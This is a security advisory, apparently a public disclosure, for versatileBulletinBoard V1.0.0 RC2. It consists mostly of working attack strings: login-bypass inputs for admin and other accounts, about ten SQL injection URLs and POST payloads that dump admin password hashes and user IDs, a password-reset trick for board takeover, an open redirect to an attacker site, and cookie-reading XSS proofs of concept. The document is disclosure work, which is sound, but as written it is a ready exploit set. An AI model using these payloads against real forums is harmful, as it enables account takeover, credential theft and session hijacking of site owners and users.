versatileBulletinBoard V1.0.0 RC2 (possibly prior versions) multiple SQL injection vulnerabilities / login bypass / board takeover
versatileBulletinBoard V1.0.0 RC2 (possibly prior versions)
multiple SQL Injection vulnerabilities / login bypass / cross site scripting /
information disclosure
software:
site: http://vbb.eniki.de/
if magic_quotes_gpc off...
A)
i)SQL INJECTION / LOGIN BYPASS
you can login as admin typing;
login: ' or 1 and name='[adminname]'/*
pass: [whatever]
also you can login with the credentials/rights of any user, typing:
login: ' or 1 and name='[username]'/*
pass: [whatever]
ii) SQL INJECTION in "search this thread" feature when you surf the forum:
%')UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,pass FROM vbb_user
where name='[admin_nickame]'/*
(you can't do it manually, input field is too small, but you can modify the
POST...)
iii)SQL INJECTION in index.php "select" argument
http://[target]/[path]/index.php?target=viewmesg&select='UNION%20SELECT%20pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass%20FROM%20vbb_user%20where%20name='[admin_nickname]'/*
http://[target]/[path]/index.php?target=viewmesg&select='UNION%20SELECT%20ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID%20FROM%20vbb_user%20where%20name='[admin_nickname]'/*
iv)SQL INJECTION in index.php "categ" argument
http://[target]/[path]/index.php?target=forum&categ='UNION%20SELECT%200,0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20vbb_user%20where%20name='[admin_nickname]'/*
also, we have:
http://[target]/[path]/index.php?target=forum&categ='UNION%20SELECT%200,0,ID,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20vbb_user%20where%20name='[admin_nickname]'/*
(to list USER ID number of any user, this will be useful after, you will see...
however, usually user ID for admin is "11")
v)SQL INJECTION in "to" argument when you post a private message (you need to
login to do this):
http://[target]/[path]/index.php?target=pm&to='UNION%20SELECT%20pass%20FROM%20vbb_user%20WHERE%20name='[admin_nickname]'/*
vi)SQL INJECTION in search for posts feature:
%'UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,pass FROM vbb_user/*
vii)SQL INJECTION:
http://[target]/[path]/userlistpre.php?list='%20UNION%20SELECT%20pass,0,0,0%20FROM%20vbb_user%20WHERE%20name='[admin_name]'/*
viii) SQL INJECTION when you see a user profile:
http://[target]/[path]/index.php?target=profile&select='UNION%20SELECT%200,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20vbb_user%20where%20name='[admin_nickname]'/*
with ii), iii), iv), v), vi), vii), viii) you will see admin MD5 password hash
at screen
ix) SQL INJECTION, you can list all users, this could be useful to dump all
passwords from database:
http://[target]/[path]/userlistpre.php?list='%20or%20isnull(1/0)/*
to see if your installation is vulnerable just digit ' in login field, if you
have a SQL error, it is
x) SQL INJECTION in "forgot password" feature, a user could manipulate the
email field to send himself new passwords for any admin/user
you will receive a link like this:
http://[target]/[path]/index.php?target=setpass&u=11&ph=[your old MD5 password
hash]
to set up a new password, but... you can call this url at any time if you have
the hash
combinating theese issues a user can take the full control of the board, reset
all passwords...
proof of concept exploit incoming...
B)
xi) XSS:
possible cross site scripting, you can craft a malicious url to redirect a user
to an arbitrary location:
http://[target]/[path]/dereferrer.php?url=http://[evil_site]/[evil_script]
and you can manipulate user cookies, poc:
http://[target]/[path]/dereferrer.php?url=%25%2522><script>alert(document.cookie)</script><!--
http://[target]/[path]/imagewin.php?file="><script>alert(document.cookie)</script>
also, you can craft malicious urls that manipulating sql queries will show some
evil javascript, poc:
http://[target]/[path]/userlistpre.php?list='%20UNION%20SELECT%20"<script>alert(document.cookie)</script>",0,0,0%20FROM%20vbb_user/*
C)
xii) information disclosure:
this is an online utility, but to list all files and versions doesn't seem very
safe ;)
http://[target]/[path]/getversions.php
rgod
site: http://rgod.altervista.org
mail: retrogod at aliceposta it
original advisory: http://rgod.altervista.org/versatile100RC2.html